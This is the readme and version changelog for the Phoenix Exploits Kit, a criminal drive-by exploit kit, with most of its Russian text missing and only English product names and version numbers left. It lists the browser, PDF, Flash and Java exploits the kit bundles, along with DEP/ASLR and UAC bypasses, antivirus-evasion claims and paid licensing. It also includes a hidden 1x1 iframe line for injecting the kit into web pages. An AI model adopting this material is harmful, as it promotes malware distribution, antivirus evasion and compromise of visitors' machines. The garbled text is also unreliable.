
======================================================================== ==============================================================================

Phoenix Exploits Kit  "PEK"       ,  :

MDAC, 
FLASH 9, FLASH 10,
PDF COLLAB, PDF PRINTF, PDF LIBTIFF,
JAVA TC, JAVA RMI, JAVA MIDI, JAVA SKYLINE,
IEPEERS, HCP

     2.5             .


=====================================================================  ==========================================================================

1)       try{}catch{}          ,      .
                  (MDAC, FLASH9, SNAPSHOT, PDF)      
       FLASH10, JAVA MIDI  ..

2)                 .

3)   Flash . 
     SWF   ... JavaScript!
              ! :)

========================================================================= ==============================================================================

      PDF         11     PDF  PEK    
    (style=display:none;).
  : <iframe src="http://domain.com/phx/index.php" width="1" height="1" frameborder="0"></iframe>


========================================================================  ==========================================================================

-----------v2.5------------------------------------

[+] 2 JAVA  JAVA RMI  JAVA MIDI      JRE   JAVA TC   
        /    .      JAVA: TC/RMI/MIDI.

[+]   JAVA SKYLINE  JRE 1.6.0_19-1.6.0_21   Internet Explorer  Windows XP/Vista/Windows 7.

[+]  

[+]       *

(*)    v2.5 full,   2.5 light       .


-----------v2.4------------------------------------

[+]   JAVA TC       JAVA DESERIALIZE  JAVA GSB .
       JRE/JDK  1.5.0-1.5.0_23  1.6.0-1.6.0_18  Win XP/VISTA/7.

[+]  QUICKTIME   QUICKTIME PLAYER v. 7.6.6-7.6.7  Win XP  IE 6/7/8.

[+]  PDF FONT   ADOBE READER 9.3.1-9.3.4  Win XP/VISTA/7.

[+]  .            .
           .

[+]   JAVA  -        /IP.
         ,     ,   IP     . 

-----------v2.3------------------------------------

[+]  PDF LIBTIFF      ASLR+DEP   Adobe Reader 8.0-9.3.0     Windows VISTA  WINDOWS7.

-----------v2.21-----------------------------------

[+]HCP      IE8     Real Player
   (       Windows Media Player >= 10)

[+]  HCP     (FireFox, Safari, Chrome, etc.)
   (   Windows Media Player <10  Real Player)

[+]    ,    

[+]    FireFox

[*]     l.php, 
             PHP.

-----------v2.2------------------------------------

[+] HCP   Win XP all SP IE 7/8.

[+] JAVA SMB 

[+] PDFSWF   Adobe Reader 9.3.1-9.3.2  Win XP SP3

[+] PDFOPEN -  Adobe Reader 9.x

[+]  PDF     (FireFox, Opera, Safari, etc.)

[+]   , WIN7       

-----------v2.1------------------------------------

[+] PDF NEWPLAYER  PDF ALL            FireFox

[+]       

-----------v2.0------------------------------------

[+]  PDFLIBTIFF (CVE-2010-0188)  Acrobat Reader 9.0-9.3     DEP   JavaScript  Adobe Reader  Windows XP.
         PDFNEWPLAYER  PDFGETICON            
      -PDFLIBTIFF         .

[+]    IEPEERS  IE6/IE7              
      ,                - 
      , ,    6 ,   !                
      ,           .
       Windows XP SP2/SP3/Windows Vista    UAC!

[+]    JAVA GSB  JAVA DESERIALIZE  (         jre  !).
             jre (1.5.0-1.5.0-21),        .

[*]       - JAVA DESERIALIZE  GSB            .
        Windows Vista  PDF Geticon           DEP.
                  UAC,         DEP    
        DEP.        Windows Vista  .  Windows.

[+]Phoenix Tripple System -    6  PDF  JS         
       .
         - . 
    -    .
          Web-       Web Money.       
        30                    .
                 ICQ  Jabber           
                 .     30       
          icq/jabber          "".
                      .

[*] IE SNAPSHOT        .

-----------v1.4------------------------------------

[+] Java Deserialize   JRE 1.6.0-1.6.0_10     Windows Vista  Windows 7    UAC.
         Windows 7,      !

[+]            black-.

[+]      Windows 7   Google Chrome.


-----------v1.31-----------------------------------

[*]     Adobe Reader 9.3  8.2     PDF NEWPLAYER     .
                .

[+]   .exe     

[+]  activate.php     ,           .

-----------v1.3-----------------------------------

[+]   JAVA GSB (CVE-2009-3867)           JRE/JDK 1.6.0 - 1.6.0_16.

[+]  PDF       (730 ),         PDF    .
          PDF ,       .

[*]       (AOL IWINAMP, DSHOW, FF EMBED, IE7 MEMORY CORRUPTION)
              .

-----------v1.2-----------------------------------

[+]       new player();  Acrobat Reader 8-9.2      .

[+]  .exe  .

[+]     (  index.php?n=X)
           X.

[+]  JS   KAV8,       0/41  virustotal.com.       .


-----------v1.1-----------------------------------

[+]  PDF            .

[+]   PDF         11 . 
    Javascript Document Level       PDF .
    -   ,  Acrobat Reader  .

[+]   PDF    .
                  collab 8   .
      printf                 .
          - 6-7  collab, 8-9  geticon,  7.1.0 - printf.
     PDF        (   Adobe Reader 9.0)

[-]   PDF plug-in  FireFox    . 
     -        Acrobat Reader 6/7.

[+]  JS    ,      .
              ~ 1,5-2  (    ).
          -         -       tmp.
           recrypt.php.

-----------v1.0-----------------------------------

[-]    JAVA PACK200 .

[-]          AOL IWINAMP, DIRECTSHOW, MS09-002  IE7 XML PARSING.

[-]   Adobe Acrobat Reader  Internet Explorer.

[-]      Internet Explorer.

[-]        MS09-002     .

[+]  Javascript      Callee.

[+]  heap spraying' FLASH10        9.0.124, 9.0.151, 9.0.159 Flash Player'a   Windows XP SP3.

[+]   FLASH .  FLASH       SWF       Javascript.

[+]     Flash Player  9.0.124, 9.0.151, 9.0.159, 10.12.36  10.0.22.87      Windows VISTA.

[+] FIREFOX EMBED . 

[+]  FLASH    FireFox.

[+]  PDF (beta)         .

-----------v1.0beta---------------------------------

   (-)

================================================================    ======================================================================

1)            (  index.php?n=X)   exeX.exe. 

2)   : 
  -Standard (  ), 
  -Silent (          MDAC, SNAPSHOT, FLASH9, JAVA GSB    JRE/SDK, PDF  Adobe Reader 6.0-8.1.2)
  -Super Silent (          - MDAC, SNAPSHOT, FLASH9, PDF  Adobe Reader 8.0-8.1.2)

3) Lite     JavaScript    Standard, Silent  Super Silent        .

4)          .
                      .
                     .

5)   PDF        JavaScript    PDF .
  (             )

6)   FLASH10    SWF        .
  (    ,   )

7)    -   "" ;)